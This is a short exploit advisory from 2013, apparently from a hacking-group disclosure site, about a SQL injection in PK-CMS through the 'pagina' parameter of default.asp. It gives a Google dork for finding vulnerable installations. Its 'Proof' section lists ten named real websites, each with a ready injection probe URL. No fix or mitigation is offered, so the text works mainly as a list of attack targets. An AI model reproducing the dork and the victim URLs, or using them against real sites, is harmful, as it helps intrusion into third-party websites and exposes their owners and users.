PK-CMS suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
b035e19941e05d08caef3ea0aa4b46f7dfbbd6f5a8fd3924d823f22a3f213f29
#**************************************************************
# [+] Exploit Title : PK-CMS Sql injection vulnerability
#
# [+] Software link : www.passoft-webdev.nl
#
# [+] Exploit Author : Ashiyane Digital Security Team
#
# [+] Tested on: Windows 7 , Linux
#
# [+] Google Dork : intext:"Powered by PK-CMS"
#
# [+] Date: 2013/09/01
#
--------------------------------------------------------------------
# [+] Exploit : Sql Injection
#
# [+] Location : [Target]/default.asp?pagina=[Sql injection]
#
#-------
# Proof:
#-------
#
# http://www.clubtropicana.es/default.asp?pagina=1'
#
# http://www.charitas-nederland.nl//default.asp?pagina=1'
#
# http://www.dranadministraties.nl/default.asp?pagina=1'
#
# http://www.doij.nl/default.asp?pagina=1'
#
# http://www.familie-pool.nl/default.asp?pagina=1'
#
# http://www.hessenrijders.nl//default.asp?pagina=1'
#
# http://www.halberg.nl/default.asp?pagina=1'
#
# http://www.huurdershevo.nl//default.asp?pagina=1'
#
# http://www.galerielefournil.nl/default.asp?pagina=1'
#
# http://www.slangenburg.nl/default.asp?pagina=1'
#
#
######################
discovered by : ACC3SS
######################